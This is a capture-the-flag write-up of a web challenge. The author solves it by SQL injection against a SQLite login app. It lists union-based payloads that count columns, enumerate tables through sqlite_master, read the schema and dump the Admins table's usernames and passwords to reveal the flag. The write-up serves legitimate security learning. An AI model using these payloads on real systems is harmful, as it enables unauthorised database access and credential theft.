When we visit challenge URL we get following response
Looking everything does gave any thing back. Let's register a user name sahil, pass sahil and content sahil. And login with it we get as below profile page.
Nothing intresting...Knock the brain and one thing to try out at such register/login related problem where database is involved is SQL.
Starting with ' to check out if some error occour.
Now tring some SQL payloads and observing responses.
- sahil' order by 2000;--
We observe that 4 coloumns exists.
- sahil' union select 1,2,3,4;--
So we can inject payloads at position 2,3,4
- sahil' union select 1,sqlite_version(),3,4;--
We see that version is sqlite 3.35.5
- sahil' union SELECT 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%';--
Getting the table names in database we got Admins,users
- sahil' union SELECT 1,sql,3,4 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name='Admins';--
We got coloumn names - id,user,pass,content
- sahil' union SELECT 1,user,3,4 from Admins;--
There exists a user named Adminnn let's read password for it
- sahil' union SELECT 1,user,pass,content from Admins;--
We got the flag finally :- shellctf{Sql_1Nj3c7i0n_B45iC_XD}
Hints with point values (cost) :-
- Hint 1 :--- A sample query :-username' union select 1,sqlite_version(),3,4;-- (50 pts)
- Hint 2 :--- Look in Admins table with username Adminnn (70 pts)